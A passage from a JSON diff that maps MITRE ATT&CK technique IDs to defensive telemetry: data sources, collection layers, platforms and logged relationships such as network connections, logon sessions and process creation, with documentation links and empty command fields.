"IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1134.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1213.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1213.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1555.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1559.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1559", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1558", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1557", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network 